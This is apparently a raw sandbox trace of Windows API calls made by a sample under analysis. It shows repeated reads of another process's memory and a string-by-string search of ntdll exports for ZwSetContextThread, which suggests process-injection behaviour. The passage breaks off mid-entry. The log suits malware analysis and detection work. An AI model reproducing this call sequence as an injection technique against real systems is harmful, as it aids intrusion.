0x0 [0134.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba6000, Buffer=0x7ffb, BufferSize=0xb36000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba7000, Buffer=0x7ffb, BufferSize=0xb37000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba8000, Buffer=0x7ffb, BufferSize=0xb38000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba9000, Buffer=0x7ffb, BufferSize=0xb39000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baa000, Buffer=0x7ffb, BufferSize=0xb3a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bab000, Buffer=0x7ffb, BufferSize=0xb3b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.589] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bac000, Buffer=0x7ffb, BufferSize=0xb3c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.589] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bad000, Buffer=0x7ffb, BufferSize=0xb3d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.589] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bae000, Buffer=0x7ffb, BufferSize=0xb3e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.589] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baf000, Buffer=0x7ffb, BufferSize=0xb3f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.589] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb0000, Buffer=0x7ffb, BufferSize=0xb40000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.589] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb1000, Buffer=0x7ffb, BufferSize=0xb41000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.590] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb2000, Buffer=0x7ffb, BufferSize=0xb42000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.590] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb3000, Buffer=0x7ffb, BufferSize=0xb43000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.590] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb4000, Buffer=0x7ffb, BufferSize=0xb44000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.590] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb5000, Buffer=0x7ffb, BufferSize=0xb45000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.590] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb6000, Buffer=0x7ffb, BufferSize=0xb46000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.590] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb7000, Buffer=0x7ffb, BufferSize=0xb47000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.591] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb8000, Buffer=0x7ffb, BufferSize=0xb48000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.591] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb9000, Buffer=0x7ffb, BufferSize=0xb49000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.591] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bba000, Buffer=0x7ffb, BufferSize=0xb4a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.591] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbb000, Buffer=0x7ffb, BufferSize=0xb4b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.591] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbc000, Buffer=0x7ffb, BufferSize=0xb4c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.592] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbd000, Buffer=0x7ffb, BufferSize=0xb4d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.592] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbe000, Buffer=0x7ffb, BufferSize=0xb4e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.592] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbf000, Buffer=0x7ffb, BufferSize=0xb4f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.592] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc0000, Buffer=0x7ffb, BufferSize=0xb50000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.592] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc1000, Buffer=0x7ffb, BufferSize=0xb51000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.592] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc2000, Buffer=0x7ffb, BufferSize=0xb52000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.593] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc3000, Buffer=0x7ffb, BufferSize=0xb53000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.593] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc4000, Buffer=0x7ffb, BufferSize=0xb54000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.593] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc5000, Buffer=0x7ffb, BufferSize=0xb55000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.594] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc6000, Buffer=0x7ffb, BufferSize=0xb56000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.594] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc7000, Buffer=0x7ffb, BufferSize=0xb57000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.594] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc8000, Buffer=0x7ffb, BufferSize=0xb58000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.594] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc9000, Buffer=0x7ffb, BufferSize=0xb59000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.594] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bca000, Buffer=0x7ffb, BufferSize=0xb5a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.595] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcb000, Buffer=0x7ffb, BufferSize=0xb5b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.595] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcc000, Buffer=0x7ffb, BufferSize=0xb5c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.595] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcd000, Buffer=0x7ffb, BufferSize=0xb5d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.595] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bce000, Buffer=0x7ffb, BufferSize=0xb5e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.595] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcf000, Buffer=0x7ffb, BufferSize=0xb5f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.596] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd0000, Buffer=0x7ffb, BufferSize=0xb60000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.596] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd1000, Buffer=0x7ffb, BufferSize=0xb61000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.596] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd2000, Buffer=0x7ffb, BufferSize=0xb62000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.596] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd3000, Buffer=0x7ffb, BufferSize=0xb63000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.596] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd4000, Buffer=0x7ffb, BufferSize=0xb64000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.597] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd5000, Buffer=0x7ffb, BufferSize=0xb65000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.597] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd6000, Buffer=0x7ffb, BufferSize=0xb66000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.597] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd7000, Buffer=0x7ffb, BufferSize=0xb67000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.597] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd8000, Buffer=0x7ffb, BufferSize=0xb68000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.597] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd9000, Buffer=0x7ffb, BufferSize=0xb69000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bda000, Buffer=0x7ffb, BufferSize=0xb6a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdb000, Buffer=0x7ffb, BufferSize=0xb6b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdc000, Buffer=0x7ffb, BufferSize=0xb6c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdd000, Buffer=0x7ffb, BufferSize=0xb6d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.598] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bde000, Buffer=0x7ffb, BufferSize=0xb6e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.599] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdf000, Buffer=0x7ffb, BufferSize=0xb6f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.599] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be0000, Buffer=0x7ffb, BufferSize=0xb70000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.599] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be1000, Buffer=0x7ffb, BufferSize=0xb71000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.599] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be2000, Buffer=0x7ffb, BufferSize=0xb72000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.600] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be3000, Buffer=0x7ffb, BufferSize=0xb73000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.600] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be4000, Buffer=0x7ffb, BufferSize=0xb74000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.600] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be5000, Buffer=0x7ffb, BufferSize=0xb75000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.600] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be6000, Buffer=0x7ffb, BufferSize=0xb76000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.600] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be7000, Buffer=0x7ffb, BufferSize=0xb77000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.600] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be8000, Buffer=0x7ffb, BufferSize=0xb78000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.601] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be9000, Buffer=0x7ffb, BufferSize=0xb79000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.601] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bea000, Buffer=0x7ffb, BufferSize=0xb7a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.601] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28beb000, Buffer=0x7ffb, BufferSize=0xb7b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.601] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bec000, Buffer=0x7ffb, BufferSize=0xb7c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.601] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bed000, Buffer=0x7ffb, BufferSize=0xb7d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bee000, Buffer=0x7ffb, BufferSize=0xb7e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bef000, Buffer=0x7ffb, BufferSize=0xb7f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bf0000, Buffer=0x7ffb, BufferSize=0xb80000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bf1000, Buffer=0x7ffb, BufferSize=0xb81000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.602] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bf2000, Buffer=0x7ffb, BufferSize=0xb82000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bf3000, Buffer=0x7ffb, BufferSize=0xb83000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bf4000, Buffer=0x7ffb, BufferSize=0xb84000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bf5000, Buffer=0x7ffb, BufferSize=0xb85000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bf6000, Buffer=0x7ffb, BufferSize=0xb86000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bf7000, Buffer=0x7ffb, BufferSize=0xb87000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.603] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bf8000, Buffer=0x7ffb, BufferSize=0xb88000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0134.629] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwSetContextThread") returned -1 [0134.777] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwSetContextThread") returned -1 [0134.778] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgPrint", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwSetContextThread") returned -1 [0134.779] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwSetContextThread") returned -1 [0134.780] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwSetContextThread") returned -1 [0134.781] lstrcmpA 